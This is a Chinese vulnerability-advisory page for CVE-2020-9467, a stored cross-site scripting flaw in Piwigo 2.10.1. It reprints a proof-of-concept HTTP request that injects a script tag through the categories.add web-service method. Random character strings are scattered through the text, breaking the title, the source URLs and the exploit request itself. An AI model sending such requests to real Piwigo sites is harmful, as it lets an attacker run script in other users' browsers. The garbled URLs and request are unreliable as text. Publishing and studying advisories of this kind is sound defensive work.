Piwigo 代码问题漏洞

漏洞ID 1972686 漏洞类型 跨站脚本
发布时间 2020-09-17 更新时间 2020-09-17
CVE编号 CVE-2020-9467

CNNVD-ID CNNVD-202003-1640
漏洞r W C r ] 1 9 ? / N/A CVSS评分 N/A
漏洞来源
https://cxseL | ! V t 6 curity.com/issue/WLB-2020090076
http://www.cnnvd.org.cW , ; 0 L 3 I W jn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1640
漏洞详情
Piwigo是一套基于Web的开源图片库软件。该软件包括图片管理、U G D f 5 B图片分类和权限管理等功能。
Pi! Q z i l RwigoJ 0 p ` e D e 2.10.1版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户/ C x % q代码
漏洞EXP
# Exploit Title: Piwigo 2.10.1 - Cross Siteg M t v 9 ScriptiI 2 s ~ } # I ) lngy  S G  Y p
# POC by: Iridium{ 3 z D L
# Software Homepage: http:/T N z { G/www.piwigo.org
# Version : 2.10.1
# Tested on: Linux & Windows
# CaG ! ~ i T r 5tegory: webapps
# Google Dork: intext: "Powered by Piwigo"
# CVE : CVE-2020-h J [ S = | F9467
######## Description ########
Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request
because of the pwgD & 8 t ^ P m z.images.setInfo func- s m ^ ( A ] ution.
######## Proof of Concept ########
*Request*
POST /piwigo/ws.pK 6 = z A m D y fhp?format=json HTTP/1.1
Host: [victim]
UserU ^ N U =-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rh w = vv:80.0) Gecko/5 j ^ % n20100101
Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01@ s % S F ]
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://[vicT U R P Etim]
Connection: close
Referer: http://[victim]/piwigo/admin.php?page=photos_add&se$ 5 1 T k O K ! ,ction=direct
Cookie: pwg_id=08tksticrdkct} b h Rrvj3gufqqbsnh
method=pwg; 2 f o.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fsc* 7 =ript%3E
参考资料

来源:CONFIRM

链接:https://github.com/Piwigo/Piwigo/issues/1168

来源:nvd.nist.gov

链接:htt* { 2ps://nvd.nist.gs - % { K lov/vuln/detail/CVE-2020-9467